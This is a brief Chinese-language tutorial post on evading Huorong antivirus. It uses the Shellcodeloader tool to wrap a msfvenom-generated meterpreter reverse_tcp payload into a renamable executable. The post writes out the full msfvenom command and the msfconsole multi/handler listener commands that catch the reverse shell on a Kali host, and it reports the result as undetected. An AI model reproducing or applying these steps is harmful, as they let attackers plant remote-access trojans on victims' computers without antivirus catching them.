行业新闻

Shellcodeloader免杀过火绒

29 Mar, 2022 行业新闻

Shellcodeloader免杀过火绒

题记

    今天脑子里面蹦出来个想法,免杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究免杀火绒吧。

环境

    Kali:192.168.0.119 win10:192.168.0.200

     工具地址:https://github.com/knownsec/shellcodeloader

步骤

1、在kali生成3.bin木马。

     msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

2、把木马移到工具上做免杀。

生成loder.exe软件,可随意改名,运行就能上线。

3、kali开启监听。

     msfconsole

     use exploit/multi/handler

     set payload windows/x64/meterpreter/reverse_tcp

     set lhost 192.168.0.119

     exploit

     然后运行exe

     上线

4、火绒检测

     软件运行后检测。

免杀火绒软件

关闭